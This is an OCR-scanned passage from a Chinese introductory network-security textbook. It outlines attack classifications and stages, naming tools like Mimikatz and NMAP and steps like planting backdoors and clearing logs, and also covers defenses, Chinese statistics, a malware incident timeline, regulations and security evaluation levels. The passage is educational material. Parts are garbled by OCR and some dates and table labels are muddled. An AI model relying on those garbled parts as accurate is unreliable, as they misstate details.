1.2 研究 网 络 安全 的 两 大 体系 结构 : 攻击 和 防御 


从 系统 安全 的 角度 可 以 把 网 络 安全 的 研究 内 容 分 为 两 大 体系 : 网 络 攻 击 和 网 络 防 御 ， 


见 图 1-1。 
网 络 攻击 防御 体系 


攻击 技术 
基于 协议 的 攻击 技术 


防御 技术 
基于 协议 的 防御 技术 


操作 系统 漏洞 攻击 技术 操作 系统 安全 配置 技术 
Isid ipic i DU TS 漏洞 防御 技术 
Web 应 用 漏洞 攻击 技术 Web 应 用 漏洞 防御 技术 
i i 
网 络 攻防 的 实施 


工具 软件 : 木马 /网 络 扫描 工具 /炸弹 工具 /木马 克星 /安全 防御 工具 等 
i 


网 络 安全 物理 基础 
操作 系统 : UNIX/Linux/Windows 
网 络 协 议 : TCP/IP/UDP/SMTP/POP/FTP/HTTP 


1-1 网 络 攻击 和 网 络 防御 


网 络 攻击 指 网 络 用 户 未 经 授权 的 访问 尝试 或 使 用 尝试 ,其 攻击 目标 主要 是 破坏 网 络 信 
息 的 保密 性 、 网 络 信 息 的 完整 性 、 网 络 服务 的 使 用 性 、 网 络 信息 的 非 否认 性 (抵赖 性 ) 和 网 络 
运行 的 可 控 性 。 

网 络 防御 指 致力 于 解决 诸如 如 何 有 效 进行 介入 控制 ,以 及 如 何 保证 数据 传输 的 安全 性 
的 技术 手段 ,主要 包括 物理 安全 分 析 技 术 、 网 络 结构 安全 分 析 技 术 、 系 统 安全 分 析 技 术 、 管 理 
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安全 分 析 技 术 及 其 他 的 安全 服务 和 安全 机 制 策略 。 
1.2.1 网 络 攻击 分 类 

随 着 互联 网 的 迅猛 发 展 , 一 些 “ 信 息 垃圾 ”“ 邮 件 炸 弹 ”“ 病 毒 木马 "“ 网 络 黑客 ”等 越 来 
越 多 地 威胁 着 网 络 的 安全 ,而 网 络 攻击 是 最 重要 的 威胁 来 源 之 一 ,所 以 有 效 地 防范 网 络 攻 击 
势 在 必 行 ,一 个 能 真正 有 效应 对 网 络 攻击 的 高 手 应 该 做 到 知己 知 彼 , 方 可 百 战 不 至。 网 络 攻 
击 主要 包括 以 下 几 个 方面 。 

1. 按照 TCP/IP 协议 层次 进行 分 类 

这 种 分 类 是 基于 对 攻击 所 属 的 网 络 层次 进行 的 ,TCP/IP 协议 传统 意义 上 分 为 4 层 , 攻 
击 类 型 也 可 以 分 成 4 类 。 

CD 针对 数据 链 路 层 的 攻击 (如 ARP 欺骗 ) 。 

(2) 针对 网 络 层 的 攻击 (如 Smurf 攻击 、ICMP 路 由 欺骗 ) 。 

G) 针对 传输 层 的 攻击 (如 SYN 洪水 攻击 ,会 话 支持)。 

(4) 针对 应 用 层 的 攻击 (如 DNS 欺骗 和 窃取 ) 。 

2. 按照 攻击 者 目的 分 类 攻击 

(D DoS( 拒 绝 服务 攻击 ) 和 DDoS( 分 布 式 拒绝 服务 攻击 ) 。 

(2) Sniffer 监听 。 

3. 按 危害 范围 分 类 攻击 

CD 局 域 网 范围 。 如 Sniffer 和 一 些 ARP 欺骗 。 

(2) 广域网 范围 。 如 大 规模 僵尸 网 络 造成 的 DDoS, 

(3) 会 话 劫持 与 网 络 欺骗。 

(4) 获得 被 攻击 主机 的 控制 权 , 针 对 应 用 层 协议 的 缓冲 区 溢出 ,基本 上 其 目的 都 是 为 了 
得 到 被 攻击 主机 的 Shell。 


1.2.2 网 络 攻击 的 具体 步骤 


1. 网 络 监听 

自己 不 主动 去 攻击 别人 ,在 计算 机 上 设置 一 个 程序 去 监听 目标 计算 机 与 其 他 计算 机 通 
信 的 数据 (Sniffer) 。 

2. 网 络 扫 描 

利用 程序 去 扫描 目标 计算 机 开放 的 端口 等 ,目的 是 发 现 漏洞 ,为 人 侵 该 计算 机 做 准备 
(Mimikatz 获取 系统 密码 .NMAP 扫描 漏洞 .Xcan-SCAN 漏洞 `Findpass) 。 

3. BR A 

当 探 测 发 现 对 方 存在 漏洞 以 后 ,入 侵 到 目标 计算 机 获取 信息 (Snake IIS. RTCS) 。 

4. 网 络 后 门 


成 功 入侵 目 标 计算 机 后 ,为 了 对 ”战利品 ?长 期 控制 ,在 目标 计算 机 中 种 植木 马 等 后 门 
(Telnet, Win2kPass) 。 


" 
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5. 网 络 隐身 


入 侵 完毕 退出 目标 计算 机 后 ,将 自己 入 侵 的 痕迹 清除 ,从 而 防止 被 对 方 管理 员 发 现 〈 清 
除 日 志 ) 。 


1.2.3 防御 技术 的 4 个 方面 


1. 操作 系统 的 安全 配置 

操作 系统 的 安全 是 整个 网 络 安 全 的 关键 , 目前 服务 器 常用 的 操作 系统 有 三 类 : UNIX, 
Linux 和 Windows Server 2008。 这 些 操 作 系 统 都 是 符合 C2 级 安全 级 别 的 操作 系统 ,但 是 
都 存在 不 少 漏洞 ,如 果 对 这 些 漏洞 不 了 解 , 不 采取 相应 的 安全 措施 ,就 会 使 操作 系统 完全 暴 
露 给 入 侵 者 。 

2. 加 密 技术 

数据 加 密 技术 是 网 络 中 最 基本 的 安全 技术 ,主要 是 通过 对 网 络 中 传输 的 信息 进行 数据 
加 密 来 保障 其 安全 性 ,防止 被 监听 和 资 取 数据 ,这 是 一 种 主动 安全 防御 策略 ,用 很 小 的 代价 
即 可 为 信息 提供 相当 大 的 安全 保护 。 具 体 的 加 密 算 法 有 DES、RSA 等 。 

3. 防火 墙 技术 

利用 防火 墙 , 在 内 部 网 和 外 部 网 之 间 ,专用 网 与 公共 网 之 间 对 传输 的 数据 进行 限制 ,从 
而 防止 被 入 侵 。 

4. 入 侵 检 测 


入 侵 检 测 作为 一 种 积极 主动 的 安全 防护 技术 ,提供 了 对 内 部 攻击 、 外 部 攻击 和 误 操 作 的 
实时 保护 ,在 网 络 系统 受到 危害 之 前 拦截 和 响应 人 侵 。 因 此 被 认为 是 防火 墙 之 后 的 第 二 道 
安全 闸门 ,在 不 影响 网 络 性 能 的 情况 下 能 对 网 络 进行 监测 ,如 果 网 络 防线 最 终 被 攻破 了 , 需 
要 及 时 发 出 被 入侵 的 警报 。 


1.3. 网络 安全 的 现状 


1.3.1 我 国 网 络 安全 现状 


2016 年 1 月 22 日 ,中 国 互联 网 络 信息 中 心 CCNNIC) 发 布 了 第 37 次 4 中 国 互 联网 络 发 
展 状 况 统计 报告 》。 据 调查 显示 ,截至 2015 年 12 月 ,我 国 互联 网 普及 率 为 50. 3% ,超过 全 
球 平均 水 平 3. 9 个 百分点 ,超过 亚洲 平均 水 平 10. 1 个 百分点 。 网 民 规模 达到 6. 88 亿 , 国 际 
出 口 带宽 5 392Gbps,IP 地 址 3. 37 亿 个 ,拥有 IPv6 地 址 20 594 块 /32 ,手机 上 网 用 户 6. 20 
亿 , 比 2014 年 12 月 增加 6 303 万 人 。 不 可 避免 地 ,网 络 安全 问题 也 更 加 迅猛 。 这 几 年 随 着 
信息 化 基础 建设 的 推进 ,网 络 安全 管理 已 经 成 为 关系 国家 安全 、 社 会 稳定 的 重要 因素 ,特别 
是 随 着 4G 时 代 的 到 来 ,网 络 安全 管理 的 重要 性 将 更 加 突出 。 报 告 显 示 , 超 过 七 成 的 网 民 愿 
意 使 用 免费 的 安全 软件 ,而 近 八 成 的 网 民 对 于 在 网 上 提供 个 人 信息 安全 有 着 不 同 程度 的 担 
忧 ,网 络 信息 安 全 已 经 成 为 影响 网 民 上 网 行为 的 重要 因素 。 同 时 ,调查 显示 ,我 国企 业已 具 
备 基本 的 网 络 安全 防护 意识 : 91.4% 的 企业 安装 了 杀毒 软件 防火墙 软 件 , 其 中 超过 1/4 使 
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用 了 付费 安全 软件 ,并 有 8.9% 的 企业 部 署 了 网 络 安全 硬件 防护 系统 、17. 1% 部 署 了 软 硬 件 
集成 防护 系统 。 随 着 企业 经 营 活动 全 面 网 络 化 ,企业 对 网 络 安全 的 重视 程度 日 益 提高 ,对 网 
络 活动 安全 保障 的 需求 迅速 增长 ,这 将 加 速 我 国 网 络 安 全 管理 制度 体系 的 完善 .网 络 安 全 技 
术 防 护 能 力 的 提高 。 截 至 2015 年 年 底 , 有 34.0% 的 企业 在 基层 设置 了 互联 网 专职 岗位 ,其 
中 7 人 及 以 下 微型 企业 比例 最 低 , 为 30.2%,300 人 及 以 上 规模 企业 设置 专 岗 的 比例 接近 四 
成 。 目 前 ,中 小 微 企业 很 难 具 备 设置 专人 专 岗 的 条 件 ,但 随 着 企业 互联 网 软 硬 件 配置 的 逐渐 
完善 .互联 网 活动 的 开展 日 益 广 泛 和 深入 ,对 具备 专业 运 维 、 研 发 .商业 运营 技能 人 才 的 需求 
量 将 会 激增 。 调 研 结果 表明 ,大量 网 民 表示 愿意 使 用 免费 杀毒 软件 ,这 说 明 免 费 杀 毒 软件 对 
于 绝 大 多 数 网 民 具有 较 大 的 吸引 力 。 

报告 数据 显示 ,我 国 网 络 购物 用 户 规模 达到 4. 13 亿 , 较 2014 年 年 底 增加 5 183 万 。 与 
此 同时 ,我 国手 机 网 络 购物 用 户 规模 增长 迅速 ,达到 3. 40 亿 , 增 长 率 为 43. 9% ,手机 网 络 购 
物 的 使 用 比例 由 42.4% 提 升 至 54. 896, 2015 年 互联 网 理财 市 场 发 展 进一步 深化 ,产品 格 
局 发 生 重大 变化 ,截至 2015 年 12 月 ,购买 过 互联 网 理财 产品 的 网 民 规模 达到 9026 万 , 相 比 
2014 年 年 底 增加 1 177 万 。 网 民 对 互联 网 的 应 用 已 经 从 单纯 的 娱乐 转向 购物 、 求 职 等 多 个 
方面 ,对 网 络 信息 安全 的 需求 也 日 益 提高 ,更 加 迫切 。 

我 国信 息 网 络 安全 研究 历经 了 通信 保密 、 数 据 保 护 两 个 阶段 ,正在 进入 网 络 信 息 安全 研 
究 阶段 , 现 已 开发 研制 出 防火 墙 、 安 全 路 由 器 、 安 全 网 关 、 黑 客人 侵 检 测 、 系 统 脆弱 性 扫描 软 
件 等 。 信 息 网 络 安全 领域 是 一 个 综合 、 交 叉 的 学 科 领 域 , 它 综合 了 利用 数学 物理、 生化 信息 
技术 和 计算 机 技术 的 诸多 学 科 的 长 期 积累 和 最 新 发 展 成 果 , 提 出 系统 的 ,完整 的 和 协同 的 解 
决 信息 网 络 安全 的 方案 。 

解决 网 络 信息 安全 问题 的 主要 途径 是 利用 密码 技术 和 网 络 访问 控制 技术 。 密 码 技术 用 
于 隐蔽 传输 信息 、 认 证 用 户 身份 等 。 网 络 访问 控制 技术 用 于 对 系统 进行 安全 保护 ,抵抗 各 种 
外 来 攻击 。 目 前 ,国际 上 已 有 众多 的 网 络 安全 解决 方案 和 产品 ,但 由 于 出 口 政策 和 自主 性 等 
问题 ,不 能 直接 用 于 解决 我 国 自己 的 网 络 安全 。 现 在 ,国内 已 有 一 些 网 络 安全 解决 方案 和 产 
品 , 如 360 系列 的 网 络 安全 产品 。 


1.3.2 国外 网 络 安全 现状 


目前 在 信息 安全 技术 方面 处 于 领先 地 位 的 国家 主要 是 美国 .法 国 、 以 色 列 、 英 国 、 丹 麦 、 
瑞士 等 ,一 方面 这 些 国 家 在 技术 上 特别 是 在 芯片 技术 上 有 着 一 定 的 历史 沉积 , 另 一 方面 在 这 
些 国家 的 信息 安全 技术 的 应 用 上 (例如 电子 政务 企业 信息 化 等 ) 起 步 较 早 ,应 用 比较 广泛 。 
他 们 的 领先 优势 主要 集中 在 防火 墙 \ 人 侵 监测 漏洞 扫描 、 防 杀毒 .身份 认证 等 传统 的 安全 产 
品 上 。 而 在 注重 防 内 兼顾 防 外 的 信息 安全 综合 审计 上 ,国内 的 意识 理念 早 于 国外 ,产品 开发 
早 于 国外 ,目前 在 技术 上 有 一 定 的 领先 优势 。 

9 «11 以 后 ,国际 网 络 安全 学 术 研 究 受到 国际 大 气候 的 影响 ,围绕 “ 反 恺 ”的 主题 展开 了 
很 多 的 工作 ,但 工作 的 重心 是 以 防止 外 部 黑客 攻击 为 主 。 实 际 上 ”* 慌 怖 分 子 " 大 多 是 在 取得 
合法 的 身份 以 后 再 实施 恶性 攻击 和 破坏 的 。 审 计 监 控 体 系 正 是 以 取得 权限 进入 网 络 的 人 的 
操作 行为 都 是 不 可 信任 的 为 前 提 假 设 . 对 所 有 内 部 人 的 操作 行为 进行 记录 挖掘 、 分 析 从 而 
获得 有 价值 信息 的 一 套 安全 管理 体系 。 

2013 年 6 月 5 日 ,美国 前 中 情 局 (CIA) 职 员 爱 德 华 。 斯 诺 登 披露 给 媒体 两 份 绝密 资料 ， 
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一 份 资料 称 : 美国 国家 安全 局 有 一 项 代号 为 “棱镜 ”的 秘密 项 目 , 即 “ 核 镜 ”窃听 计划 , 始 于 
2007 年 的 小 布什 时 期 ,美国 情报 机 构 一 直 在 9 家 美国 互联 网 公司 中 进行 数据 挖掘 工作 ,从 
音频 、 视 频 、 图 片 .邮件 、 文 档 以 及 连接 信息 中 分 析 个 人 的 联系 方式 与 行动 ,监控 的 类 型 有 10 
类 : 信息 电邮 、 即 时 消息 、 视 频 、 照 片 . 存 储 数据 、 语 音 聊天 、 文 件 传输 、 视 频 会 议 、 登 录 时 间 、 
社交 网 络 资料 的 细节 ,其 中 包括 两 个 秘密 监视 项 目 , 一 是 监视 ,监听 民众 电话 的 通话 记录 ,要 
求 电信 巨头 威 瑞 森 公司 必须 每 天 上 交 数 百 万 用 户 的 通话 记录 。 男 一 份 资料 更 加 惊人 ,美国 
国家 安全 局 和 联邦 调查 局 通过 进入 微软 ,谷歌 ,苹果 等 9 大 网 络 巨头 的 服务 器 ,监控 美国 公 
民 的 电子 邮件 、 聊 天 记录 等 秘密 资料 。 他 表示 ,美国 政府 早 在 数 年 前 就 人 侵 中 国 一 些 个 人 和 
机 构 的 计算 机 网 络 , 其 中 包括 政府 官员 、 商 界 人 士 甚至 学 校 。 斯 诺 登 后 来 前 往 俄罗斯 申请 避 
难 ,获得 俄罗斯 政府 批准 。 


1.3.3 网 络 安全 事件 


20 世纪 60 年 代 , 美 国 贝 尔 实验 室 编写 的 “ 磁 芯 大 战 ”。 

20 世纪 70 年 代 , 美 国 雷 恩 的 “PI 的 青春 ”构思 病毒 。 

1982 年 ,Elk Cloner 病毒 风靡 当时 的 苹果 I 型 计算 机 。 

1983 年 11 月 ,国际 计算 机 安全 学 术 研 讨 会 对 计算 机 病毒 进行 了 实验 。20 世纪 80 年 代 
后 期 “巴基斯坦 智囊 "病毒 诞生 。 

1986 年 大脑? 病毒 出 现 ,是 通过 A 区 引导 感染 的 病毒 。 

1988 年 , 莫 里 斯 蠕虫 病毒 爆发 ,标志 网 络 病毒 的 开始 。 

1990 年 ,复合 型 病毒 出 现 , 可 感染 com 和 exe 文件 。 

1992 年 ,DOS 病毒 利用 加 载 文 件 优先 进行 工作 ,同时 生成 com 和 exe 类 文件 代表 
“ 金 蝉 ”。 

1993 年 ,利用 汇编 编写 的 幽灵 类 病毒 盛行 。 

1996 年 ,国内 出 现 G2 IVP, VCL 病毒 生产 软件 ,同时 欧美 出 现 * 变 形 金刚 "病毒 生产 机 。 

1997 年 ,微软 的 Word 宏 病毒 开始 流行 。 

1998 年 , 陈 英豪 编写 了 破坏 计算 机 硬盘 数据 ,同时 可 能 破坏 BIOS 程序 的 恶性 病毒 。 

1999 年 ,美国 发 生 历史 上 第 二 次 重创 ,美丽 杀手 ”病毒 发 生 了 一 次 大 的 爆发 。 

2000 年 ,用 VBS 编写 的 “ 爱 虫 "病毒 流行 。 

2001 年 , 尼 姆 达 病 毒 肆 虐 全 球 数 百 万 计算 机 。 

2002 年 ,Melissa 作为 邮件 附件 的 宏 病毒 流行 。 

2003 4E , SQL Slammer" 蓝宝石 ?蠕虫 病毒 流行 ,还 有 冲击波” 和 ”蠕虫 王 ”。 

2004 ^£ , Bagle 蠕虫 病毒 “震荡 波 ” 流 行 。 

2005 年 , “震荡 波 ”病毒 通过 QQ, MSN 传播 较 普遍 ,僵尸 网 络 攻击 呈 上 升 趋势 ,从 2005 
年 上 半年 开始 出 现 Rootkits 类 病毒 ,以 及 超级 病毒 , 集 多 种 病毒 特征 于 一 体 。 

2006 年 ,开始 大 规模 流行 “ 威 金 " 病 毒 “ 落 雪 ” 病 毒 ,并 且 开 始 有 频繁 的 “Oday” 类 利用 系 
统 漏洞 的 病毒 出 现 。 

2007 年 的 “熊猫 烧香 ”,autorun、ARP 视频 类 病毒 增长 迅猛 。 

2008 年 ,出 现 机 器 狗 、 磁 碟 机 ,通过 2006 年 兴起 的 免 杀 技术 的 流行 , 反 查 杀 、 反 杀毒 软 
件 , 反 主动 防御 类 新 型 病毒 出 现 。 
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2009 年 年 初 ,微软 IE, PDF ,MS08-067 , Oday 等 一 些 高 危 漏洞 流行 ,出 现 木 马 群 .NB de 
Œ „Conficker 等 。 

2010 年 “极光 ?漏洞 导致 谷歌 受到 攻击 ,迈克 菲 误杀 事件 ,思科 Cisco Live 2010 年 会 参 
会 者 名 单 被 黑 事 件 ,谷歌 数据 嗅 探 ,iPad 3G 用 户 的 信息 泄露 事件 ,美国 马萨诸塞 州 的 南岸 
医院 数据 被 窃 事件 ,Stuxnet 蠕虫 病毒 攻击 等 。 

2011 年 ,谷歌 Android 市 场 出 现 恶意 软件 ,索尼 被 黑 , 美 国花 旗 银 行 被 攻击 ,IMEF 数据 
库 遭 攻击 ,Facebook 被 攻击 导致 暴力 色情 图 片 泛 滥 ,CSDN 密码 泄露 导致 超 一 亿 用 户 密 码 
被 泄 等 。 

2012 年 , 赛 门 铁 克 两 款 企业 级 产品 源 代码 被 次 ,VMware 确认 源 代 码 被 窃 ,维基 解密 网 
站 遭受 持续 攻击 ,新 型 蠕虫 病毒 火焰 (Flame) 肆虐 中 东 ,DNSChanger 恶意 软件 肆虐 ,美国 
电子 商务 网 站 Zappos 用 户 信息 被 窃 ,LinkedIn 用 户 密码 泄露 等 。 

2013 年 ,棱镜 门 ? 事 件 ,. cn 根 域名 服务 器 遭遇 有 史 最 大 的 DDoS 攻击 ,腾讯 七 千 多 万 
QQ 群 数 据 公 开 泄露 ,Java 安全 漏洞 , 安 卓 漏洞 百出 ,中 国 互 联网 惨遭 Struts2 高 危 漏洞 摧 
残 等 。 

2014 年 ,比特 币 交易 站 受到 攻击 ,携程 漏洞 事件 ,OpenSSL 漏洞 ,eBay 数据 的 大 泄漏 ， 
BadUSB 漏洞 ,500 万 谷歌 账户 信息 被 泄露 等 。 

2015 年 ,全 球 最 大 婚外情 网 站 Ashley Madison 被 攻击 , 英 宽带 运营 商 TalkTalk 被 反 
复 攻 击 导致 四 百 余 万 用 户 隐 私 数据 终 泄露 .美国 最 大 医疗 机 构 泄露 事件 导致 Anthem 失去 
8 000 万 个 人 信息 、 网 易 邮 箱 数据 泄露 、 中 国 机 锋 网 被 曝 汇 露 2300 万 用 户 信息 等 。 

信息 泄露 事件 频 发 的 背后 ,是 互联 网 地 下 黑色 产业 链 正 日 益 壮 大 : 黑客 用 技术 手段 对 
企业 网 络 系统 进行 攻击 ,然后 将 获得 数据 中 的 用 户 信息 拿 到 * 黑 市 "上 贩卖 ; 并 根据 数据 内 
容 的 价值 为 其 标注 不 同 的 价格 。 据 称 ,10 000 条 用 户 数据 就 能 卖 到 几 百 至 上 千 元 不 等 的 价 
格 , 而 这 也 成 为 黑客 攻击 网 站 、 系 统 , 获 得 信息 数据 的 最 大 驱动 力 。 


1.4 网 络 立法 和 评价 标准 


1.4.1 我 国立 法 情况 


目前 ,网 络 安全 方面 的 法 规 已 经 写 人 中 华人 民 共 和 国 宪法 。 

从 总 体 来 看 ,中 国 的 互联 网 立法 大 约 可 分 为 三 个 阶段 。 从 1994 年 第 一 个 带 有 互联 网 性 
质 的 行政 法 规 , 即 1994 年 的 (中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 ) 发 布 ,到 2000 
年 全 国人 大 颁布 (关于 维护 互联 网 安全 的 决定 ) 为 中 国 互联 网 立法 第 一 阶段 ; 从 2000 年 到 
2012 年 全 国人 大 颁布 (关于 加 强 网 络 信 息 保 护 的 决定 ) 为 第 二 个 阶段 ; 而 从 2013 年 到 现在 ， 
为 第 三 个 阶段 。 

第 一 个 阶段 的 网 络 立 法 主要 解决 的 问题 ,是 网 络 基础 设施 和 网 络 运行 的 安全 ,涉及 的 都 
是 互联 网 系统 最 基本 的 问题 。2000 年 的 全 国人 大 决定 ,还 确立 了 在 网 络 空间 适用 法 律 的 原 
则 , 即 现 有 法 律 能 解决 问题 的 ,用 现 有 的 法 律 ,如果 网 络 空间 的 新 问题 没有 相应 的 法 律 规定 ， 
再 制定 新 的 法 律 。 也 就 是 说 ,解决 网 络 空间 的 法 律 问题 ,所 依据 和 参照 的 , 既 有 当时 现行 的 
法 律 法规, 也 有 针对 互联 网 本 身 特 点 制定 的 新 法 律 法规。 
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第 二 个 阶段 立法 的 时 候 , 中 国 的 互联 网 已 经 初 具 规模 ,中 国 互联 网 对 中 国政 治 、 经 济 和 
文化 等 各 个 领域 的 促进 和 推动 作用 也 日 趋 明显 。 因 此 ,这 个 阶段 的 互联 网 立法 主要 解决 的 
问题 是 互联 网 涉及 的 各 个 领域 的 专业 问题 , 带 有 局 部 性 ,涉及 互联 网 新 闻 信息 、 互 联网 营业 
场所 \ 互 联网 视听 节目 等 。 在 立法 权限 的 分 配 上 面 ,采取 了 将 各 领域 的 问题 委派 给 各 个 不 同 
的 部 委 立 法 的 模式 。 因 此 ,这 个 阶段 的 互联 网 立法 带 有 明显 的 部 门 特征 。 比 较 有 代表 性 的 ， 
有 2005 年 国务 院 新 闻 办 和 信息 产业 部 共同 发 布 的 (互联 网 新 闻 信息 服务 管理 规定 》、2011 
年 2 月 文化 部 发 布 的 (互联 网 文化 管理 暂行 规定 》、2007 年 7 月 国家 广播 电影 电视 总 局 发 布 
的 《互联 网 视听 节目 服务 管理 规定 ) 等 。 

第 三 个 阶段 ,是 中 国 的 互联 网 经 历 了 大 发 展 . 大 繁荣 之 后 暴露 出 大 量 问 题 的 时 间 段 。 斯 
诺 登 事件 提醒 我 们 注意 到 互联 网 与 国家 安全 的 问题 ; 发 生 在 阿拉 伯 世 界 的 社交 媒体 革命 ， 
使 我 们 意识 到 了 新 媒体 对 社会 稳定 的 关系 ; 大 量 通过 互联 网 而 发 酵 的 群体 性 事件 ,使 我 们 
意识 到 了 网 络 与 议程 设置 的 关系 。 这 个 阶段 不 仅 有 互联 网 立法 ,还 有 与 之 相关 的 一 系列 整 
治 互 联网 的 活动 ,比如 清理 网 络 大 V、 整 治 网 络 谣言 等 。 这 个 时 期 的 互联 网 立法 ,无 论 是 
2013 年 出 台 的 两 高 司法 解释 , 即 最 高 人 民法 院 、 最 高 人 民 检 察 院 ( 关 于 办 理 利用 信息 网 络 实 
施 诽谤 等 刑事 案件 适用 法 律 若干 问题 的 解释 》, 还 是 正在 酝酿 的 新 一 轮 立法 计划 ,都 会 从 全 
局 的 角度 ,从 顶层 设计 的 角度 ,全 盘 考 虑 互联 网 发 展 对 立法 提出 的 新 要 求 。 同 时 ,又 不 失 时 
机 地 根据 现实 发 展 的 要 求 , 出 台 有 针对 性 的 法 规 , 如 2014 4E 8 月 颁布 的 (即时 通信 工具 公众 
信息 服务 发 展 管理 暂行 规定 》,2014 4E 11 月 颁布 的 (中 华人 民 共 和 国 反 间谍 法 》,2015 年 7 
月 颁布 的 (中 华人 民 共 和 国 国家 安全 法 》。 

1997 年 12 月 30 日 ,公安 部 发 布 的 (计算 机 信息 网 络 国际 联网 安全 保护 管理 办 法 ) 中 有 
关 条 款 规 定 如 下 。 

第 五 条 ”任何 单位 和 个 人 不 得 利用 国际 联网 制作 、 复 制 、 查 阅 和 传播 下 列 信息 : 

(一 ) 煽动 抗拒 \ 破 坏 宪法 和 法 律 , 行 政法 规 实施 的 ; 

(二 ) 煽动 颠覆 国家 政权 ,推翻 社会 主义 制度 的 ; 

=) 煽动 分 裂 国家 、 破 坏 国 家 统一 的 ; 

(四 ) 煽动 民族 仇恨 .民族 歧视 ,破坏 民族 团结 的 ; 

(五 ) deii sk d SE M EE ,散布 谣言 ,扰乱 社会 秩序 的 ; 

CAO 宣扬 封建 迷信 淫秽、 色情、 赌博 、 暴 力 \ 凶 杀 、 恐 怖 ,教唆 犯罪 的 ; 

(七 ) 公然 侮辱 他 人 或 者 捏造 事实 诽谤 他 人 的 ; 

OO 损害 国家 机 关 信 誉 的 ; 

( 九 ) 其 他 违反 宪法 和 法 律 .行政 法 规 的 。 

第 六 条 ”任何 单位 和 个 人 不 得 从 事 下 列 危害 计算 机 网 络 安全 的 活动 : 

(一 ) 未 经 允许 ,进入 计算 机 信息 网 络 或 者 使 用 计算 机 信息 网 络 资源 的 ; 

(二 ) 未 经 允许 ,对 计算 机 信息 网 络 功能 进行 删除 、 修 改 或 者 增加 的 ; 

三 ) 未 经 允许 ,对 计算 机 信息 网 络 中 存储 、 处 理 或 者 传输 的 数据 和 应 用 程序 进行 删除 、 
修改 或 增加 的 ; 

(四 ) 故意 制作 ,传播 计算 机 病毒 等 破坏 性 程序 的 ; 

(五 ) 其 他 危害 计算 机 网 络 安 全 的 。 

第 十 条 ”互联 单位 、 接 入 单位 及 使 用 计算 机 信息 网 络 国际 联网 的 法 人 和 其 他 组 织 应 当 
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履行 下 列 安全 保护 职责 : 

(一 ) 负责 本 网 络 的 安全 保护 管理 工作 ,建立 健全 安全 保护 管理 制度 ; 

(二 ) 落实 安全 保护 技术 措施 ,保障 本 网 络 的 运行 安全 和 信息 安全 ; 

(三 ) 负责 对 本 网 络 用 户 的 安全 教育 和 培训 ; 

(四 ) 对 委托 发 布 信息 的 单位 和 个 人 进行 登记 ,并 对 所 提供 的 信息 内 容 按照 本 办 法 第 五 
条 进行 审核 ; 

(五 ) 建立 计算 机 信息 网 络 电 子 公 告 系统 的 用 户 登 记 和 信息 管理 制度 ; 

(六 ) 发 现 有 本 办 法 第 四 条 、 第 五 条 、 第 六 条 、 第 七 条 所 列 情形 之 一 的 ,应 当 保留 有 关 原 
始 记 录 ,并 在 二 十 四 小 时 内 向 当地 公安 机 关 报 告 ; 

(七 ) 按照 国家 有 关 规 定 , 删 除 本 网 络 中 含有 本 办 法 第 五 条 内 容 的 地 址 .目录 或 者 关闭 
服务 器 。 


1.4.2 我 国 评价 标准 


在 我 国 根据 (计算 机 信息 系统 安全 保护 等 级 划分 准则 》,1999 年 10 月 经 过 国家 质量 技 
术 监 督 局 批准 发 布 准则 将 计算 机 安全 保护 划分 为 以 下 5 个 级 别 ,一 到 五 级 越 来 越 高 。 

第 一 级 为 用 户 自主 保护 级 : 它 的 安全 保护 机 制 使 用 户 具 备 自主 安全 保护 的 能 力 ,保护 
用 户 的 信息 免 受 非法 的 读 写 破坏 。 

第 二 级 为 系统 审计 保护 级 : 除 具 备 第 一 级 所 有 的 安全 保护 功能 外 .要求 创建 和 维护 访 
问 的 审计 跟踪 记录 ,使 所 有 的 用 户 对 自己 的 行为 的 合法 性 负责 。 

第 三 级 为 安全 标记 保护 级 : 除 继承 前 一 个 级 别 的 安全 功能 外 ,还 要 求 以 访问 对 象 标记 
的 安全 级 别 限制 访问 者 的 访问 权限 ,实现 对 访问 对 象 的 强制 保护 。 

第 四 级 为 结构 化 保护 级 : 在 继承 前 面 安全 级 别 安全 功能 的 基础 上 ,将 安全 保护 机 制 划 
分 为 关键 部 分 和 非 关键 部 分 ,对 关键 部 分 直接 控制 访问 者 对 访问 对 象 的 存 取 ,从 而 加 强 系统 
的 抗 渗透 能 力 。 

第 五 级 为 访问 验证 保护 级 : 这 个 级 别 特别 增设 了 访问 验证 功能 ,负责 仲裁 访问 者 对 访 
问 对 象 的 所 有 访问 活动 。 


1.4.3 国际 评价 标准 


根据 美国 国防 部 开发 的 计算 机 安全 标准 一 一 (可 信任 计算 机 标准 评价 准则 》(Trusted 
Computer Standards Evaluation Criteria , TCSEC) ,也 就 是 网 络 安全 橙 皮 书 ,一 些 计 算 机 
安全 级 别 被 用 来 评价 一 个 计算 机 系统 的 安全 性 。 自 从 1985 年 橙 皮 书 成 为 美国 国防 部 的 标 
准 以 来 ,就 一 直 没 有 改变 过 ,多 年 以 来 一 直 是 评估 多 用 户主 机 和 小 型 操作 系统 的 主要 方法 。 
其 他 子 系统 (如 数据 库 和 网 络 ) 也 一 直 用 橙 皮 书 来 解释 评估 。 橙 皮 书 把 安全 的 级 别 从 低 到 高 
分 成 4 个 类 别 : D 类 、C 类 、B 类 和 A 类 ,每 类 又 分 几 个 级 别 , 见 表 1-1。 

D 级 是 最 低 的 安全 级 别 , 拥 有 这 个 级 别 的 操作 系统 就 像 一 个 门户 大 开 的 房子 ,任何 人 都 
可 以 自由 进出 ,是 完全 不 可 信任 的 。 对 于 硬件 来 说 ,是 没有 任何 保护 措施 的 ,操作 系统 容易 
受到 损害 ,没有 系统 访问 限制 和 数据 访问 限制 ,任何 人 不 需 任 何 账 户 都 可 以 进入 系统 ,不 受 
任何 限制 可 以 访问 他 人 的 数据 文件 。 属 于 这 个 级 别 的 操作 系统 有 : DOS 和 Windows 
98 等 。 
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表 1-1 国际 评价 标准 


类 al 级 别 名 K 主要 特征 

D D 低级 保护 没有 安全 保护 

B Cl 自主 安全 保护 自主 存储 控制 
C2 受 控 存 储 控制 单独 的 可 查 性 ,安全 标识 
Bl 标识 的 安全 保护 强制 存 取 控制 ,安全 标识 

B B2 结构 化 保护 面向 安全 的 体系 结构 , 较 好 的 抗 渗透 能 力 
B3 安全 区 域 存 取 监控 、 高 抗 渗 透 能 力 

A A 验证 设计 形式 化 的 最 高 级 描述 和 验证 


Cl 是 C 类 的 一 个 安全 子 级 。C1l 又 称 选择 性 安全 保护 (Discretionary Security Protection) 
系统 , 它 描述 了 一 个 典型 的 用 在 UNIX 系统 上 的 安全 级 别 ,这 种 级 别 的 系统 对 硬件 又 有 某 
